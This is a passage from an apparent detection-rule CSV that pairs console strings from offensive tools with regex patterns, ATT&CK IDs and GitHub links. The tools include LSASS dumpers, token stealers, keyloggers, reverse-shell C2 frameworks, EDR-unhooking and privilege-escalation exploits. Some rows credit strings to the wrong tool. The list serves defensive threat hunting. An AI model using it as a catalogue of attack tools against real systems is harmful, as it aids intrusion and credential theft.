PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*[+] Invoking EfsRpcQueryRecoveryAgents with target path: *",".{0,1000}\[\+\]\sInvoking\sEfsRpcQueryRecoveryAgents\swith\starget\spath\:\s.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*[+] Invoking EfsRpcQueryUsersOnFile with target path: *",".{0,1000}\[\+\]\sInvoking\sEfsRpcQueryUsersOnFile\swith\starget\spath\:\s.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*[+] Invoking EfsRpcRemoveUsersFromFile with target path: *",".{0,1000}\[\+\]\sInvoking\sEfsRpcRemoveUsersFromFile\swith\starget\spath\:\s.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*[+] Invoking EfsRpcSetEncryptedFileMetadata with target path: *",".{0,1000}\[\+\]\sInvoking\sEfsRpcSetEncryptedFileMetadata\swith\starget\spath\:\s.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*[+] Keylogger started with PID *",".{0,1000}\[\+\]\sKeylogger\sstarted\swith\sPID\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*[+] Keylogger started*",".{0,1000}\[\+\]\sKeylogger\sstarted.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","44","16","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*[+] Keylogger stopped*",".{0,1000}\[\+\]\sKeylogger\sstopped.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","44","16","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*[+] keystrokes dump from agent*",".{0,1000}\[\+\]\skeystrokes\sdump\sfrom\sagent.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*[+] Loading BetterXencrypt and doing some encryption with random iterations*",".{0,1000}\[\+\]\sLoading\sBetterXencrypt\sand\sdoing\ssome\sencryption\swith\srandom\siterations.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*[+] Loading PSObfuscation and randomizing script*",".{0,1000}\[\+\]\sLoading\sPSObfuscation\sand\srandomizing\sscript.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*[+] Loading PyFuscation and doing $some obfuscation*",".{0,1000}\[\+\]\sLoading\sPyFuscation\sand\sdoing\s\$some\sobfuscation.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*[+] LSASS dump done!*",".{0,1000}\[\+\]\sLSASS\sdump\sdone!.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","10","5","401","49","2024-04-17T08:06:17Z","2024-02-02T05:56:29Z" "*[+] LSASS Dump Read: *",".{0,1000}\[\+\]\sLSASS\sDump\sRead\:\s.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","10","5","401","49","2024-04-17T08:06:17Z","2024-02-02T05:56:29Z" "*[+] Malicious named pipe running on *",".{0,1000}\[\+\]\sMalicious\snamed\spipe\srunning\son\s.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*[+] MIND YOUR OPSEC! Serving Pyramid files from folder *",".{0,1000}\[\+\]\sMIND\sYOUR\sOPSEC!\sServing\sPyramid\sfiles\sfrom\sfolder\s.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*[+] Minidump successfully saved to memory*",".{0,1000}\[\+\]\sMinidump\ssuccessfully\ssaved\sto\smemory.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","N/A","10","3","258","59","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z" "*[+] My personal simple and stupid Token Stealer... *",".{0,1000}\[\+\]\sMy\spersonal\ssimple\sand\sstupid\s\sToken\sStealer\.\.\.\s.{0,1000}","offensive_tool_keyword","TokenStealer","stealing Windows tokens","T1134 - T1055","TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/decoder-it/TokenStealer","1","0","#program content","10","2","154","24","2023-10-25T14:08:57Z","2023-10-24T13:06:37Z" "*[+] New incoming shell from : *",".{0,1000}\[\+\]\sNew\sincoming\sshell\sfrom\s\:\s.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","N/A","10","1","6","1","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z" "*[+] No insecure resource delegations found. Eureka!*",".{0,1000}\[\+\]\sNo\sinsecure\sresource\sdelegations\sfound\.\sEureka!.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","6","1","65","6","2024-04-30T20:17:27Z","2024-03-04T03:44:52Z" "*[+] No insecure trustee delegations found. Eureka!*",".{0,1000}\[\+\]\sNo\sinsecure\strustee\sdelegations\sfound\.\sEureka!.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","6","1","65","6","2024-04-30T20:17:27Z","2024-03-04T03:44:52Z" "*[+] NtAllocateVirtualMemory Not Hooked*",".{0,1000}\[\+\]\sNtAllocateVirtualMemory\sNot\sHooked.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1574","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SaadAhla/UnhookingPatch","1","0","N/A","8","3","274","45","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" "*[+] NTDLL unhooking enabled*",".{0,1000}\[\+\]\sNTDLL\sunhooking\senabled.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","8","1","78","9","2024-04-01T15:28:44Z","2024-02-21T07:25:37Z" "*[+] NTDLL unhooking enabled*",".{0,1000}\[\+\]\sNTDLL\sunhooking\senabled.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","print output","10","10","1811","174","2024-02-24T15:33:54Z","2023-12-03T04:52:38Z" "*[+] NtProtectVirtualMemory Not Hooked*",".{0,1000}\[\+\]\sNtProtectVirtualMemory\sNot\sHooked.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1574","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SaadAhla/UnhookingPatch","1","0","N/A","8","3","274","45","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" "*[+] NtWaitForSingleObject Not Hooked*",".{0,1000}\[\+\]\sNtWaitForSingleObject\sNot\sHooked.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1574","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SaadAhla/UnhookingPatch","1","0","N/A","8","3","274","45","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" "*[+] Nuke is landing.*",".{0,1000}\[\+\]\sNuke\sis\slanding\..{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "*[+] Obtained ADSync service account token from miiserver process*",".{0,1000}\[\+\]\sObtained\sADSync\sservice\saccount\stoken\sfrom\smiiserver\sprocess.{0,1000}","offensive_tool_keyword","DumpAADSyncCreds","C# implementation of Get-AADIntSyncCredentials from AADInternals which extracts Azure AD Connect credentials to AD and Azure AD from AAD connect database.","T1555 - T1110","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Hagrid29/DumpAADSyncCreds","1","0","content","10","1","33","3","2023-06-24T16:17:36Z","2022-03-27T18:43:44Z" "*[+] Opened Process Token Sucessufully!*",".{0,1000}\[\+\]\sOpened\sProcess\sToken\sSucessufully!.{0,1000}","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","0","N/A","10","1","93","13","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" "*[+] overwriting modprobe_path with different PIDs *",".{0,1000}\[\+\]\soverwriting\smodprobe_path\swith\sdifferent\sPIDs\s.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","CVE-2024-1086 POC","10","10","1898","237","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z" "*[+] Parsed Procmon output for potential DLL hijack paths!*",".{0,1000}\[\+\]\sParsed\sProcmon\soutput\sfor\spotential\sDLL\shijack\spaths!.{0,1000}","offensive_tool_keyword","DLLHijackTest","DLL and PowerShell script to assist with finding DLL hijacks","T1574.002 - T1055.001 - T1059.001 - T1036.005","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/slyd0g/DLLHijackTest","1","0","N/A","9","4","321","58","2020-10-01T22:37:36Z","2020-06-20T04:33:01Z" "*[+] Payload DLL successfully loaded after*",".{0,1000}\[\+\]\sPayload\sDLL\ssuccessfully\sloaded\safter.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","N/A","8","4","317","34","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z" "*[+] Payload format: pwsh*",".{0,1000}\[\+\]\sPayload\sformat\:\spwsh.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*[+] PE Loader mode is selected!*",".{0,1000}\[\+\]\sPE\sLoader\smode\sis\sselected!.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","8","6","581","81","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z" "*[+] PInject Loaded *",".{0,1000}\[\+\]\sPInject\sLoaded\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*[+] Pipe listing:*",".{0,1000}\[\+\]\sPipe\slisting\:.{0,1000}","offensive_tool_keyword","RemotePipeList","A small tool that can list the named pipes bound on a remote system.","T1047 - T1021.006","TA0008 - TA0002","N/A","N/A","Discovery","https://github.com/outflanknl/C2-Tool-Collection/tree/main/Other/RemotePipeList","1","1","#contentstrings","10","10","1052","180","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z" "*[+] Poc By @404death *",".{0,1000}\[\+\]\sPoc\sBy\s\@404death\s.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","0","N/A","8","4","353","39","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" "*[+] PocScan *",".{0,1000}\[\+\]\sPocScan\s.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*[+] Polymorphic encryption*",".{0,1000}\[\+\]\sPolymorphic\sencryption.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","8","6","581","81","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z" "*[+] Potenatially Hijackable DLL: *",".{0,1000}\[\+\]\sPotenatially\sHijackable\sDLL\:\s.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*[+] PowershellKerberos Loaded*",".{0,1000}\[\+\]\sPowershellKerberos\sLoaded.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*[+] PowerView Loaded*",".{0,1000}\[\+\]\sPowerView\sLoaded.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*[+] PPID Spoofing has been disabled*",".{0,1000}\[\+\]\sPPID\sSpoofing\shas\sbeen\sdisabled.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","8","1","78","9","2024-04-01T15:28:44Z","2024-02-21T07:25:37Z" "*[+] PPID Spoofing has been disabled*",".{0,1000}\[\+\]\sPPID\sSpoofing\shas\sbeen\sdisabled.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","print output","10","10","1811","174","2024-02-24T15:33:54Z","2023-12-03T04:52:38Z" "*[+] printing b64encoded(zipped(cradle.py)) for scriptless execution on terminal:*",".{0,1000}\[\+\]\sprinting\sb64encoded\(zipped\(cradle\.py\)\)\sfor\sscriptless\sexecution\son\sterminal\:.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*[+] Pyramid HTTP Server listening on port *",".{0,1000}\[\+\]\sPyramid\sHTTP\sServer\slistening\son\sport\s.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*[+] Querying DC without Global Catalog: *",".{0,1000}\[\+\]\sQuerying\sDC\swithout\sGlobal\sCatalog\:\s.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/Hackcraft-Labs/SharpShares","1","0","N/A","9","1","29","6","2023-11-13T14:08:07Z","2023-10-25T10:34:18Z" "*[+] Randomizing syscall names*",".{0,1000}\[\+\]\sRandomizing\ssyscall\snames.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/GraphStrike","1","0","N/A","10","10","504","70","2024-01-29T16:39:40Z","2024-01-02T00:18:44Z" "*[+] Rasman service is error*",".{0,1000}\[\+\]\sRasman\sservice\sis\serror.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","10","4","361","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" "*[+] Rasman service is running!*",".{0,1000}\[\+\]\sRasman\sservice\sis\srunning!.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","10","4","361","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" "*[+] RDP Keylog saved to *",".{0,1000}\[\+\]\sRDP\sKeylog\ssaved\sto\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*[+] RDP Keylogger Loaded*",".{0,1000}\[\+\]\sRDP\sKeylogger\sLoaded.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*[+] RDP Keylogger started with PID *",".{0,1000}\[\+\]\sRDP\sKeylogger\sstarted\swith\sPID\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*[+] Ready for Post-Exp :)*",".{0,1000}\[\+\]\sReady\sfor\sPost\-Exp\s\:\).{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","0","N/A","10","5","452","69","2024-04-19T20:15:04Z","2023-07-24T13:59:16Z" "*[+] Registry key set. DLL will be loaded on reboot*",".{0,1000}\[\+\]\sRegistry\skey\sset\.\sDLL\swill\sbe\sloaded\son\sreboot.{0,1000}","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*[+] Relaying seems successfull, check ntlmrelayx output!*",".{0,1000}\[\+\]\sRelaying\sseems\ssuccessfull,\scheck\sntlmrelayx\soutput!.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","10","10","1281","200","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z" "*[+] Rubeus Loaded*",".{0,1000}\[\+\]\sRubeus\sLoaded.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*[+] Run the spawn method for SYSTEM shell:*",".{0,1000}\[\+\]\sRun\sthe\sspawn\smethod\sfor\sSYSTEM\sshell\:.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*[+] RUNNING ALL KNOWN EXPLOITS*",".{0,1000}\[\+\]\sRUNNING\sALL\sKNOWN\sEXPLOITS.{0,1000}","offensive_tool_keyword","CoercedPotato","CoercedPotato From Patate (LOCAL/NETWORK SERVICE) to SYSTEM by abusing SeImpersonatePrivilege on Windows 10 Windows 11 and Server 2022.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Prepouce/CoercedPotato","1","0","N/A","10","3","259","63","2023-11-03T20:58:26Z","2023-09-11T19:04:29Z" "*[+] running normal privesc*",".{0,1000}\[\+\]\srunning\snormal\sprivesc.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","CVE-2024-1086 POC","10","10","1898","237","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z" "*[+] RX Injection address: *",".{0,1000}\[\+\]\sRX\sInjection\saddress\:\s.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#contentstrings","10","3","205","31","2023-11-16T13:42:41Z","2023-10-19T07:54:39Z" "*[+] S4U2proxy success!*",".{0,1000}\[\+\]\sS4U2proxy\ssuccess!.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*[+] S4U2self success!*",".{0,1000}\[\+\]\sS4U2self\ssuccess!.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*[+] Safety checks passed. Implanting your DLL*",".{0,1000}\[\+\]\sSafety\schecks\spassed\.\sImplanting\syour\sDLL.{0,1000}","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*[+] Save encrypted shellcode to *",".{0,1000}\[\+\]\sSave\sencrypted\sshellcode\sto\s.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation 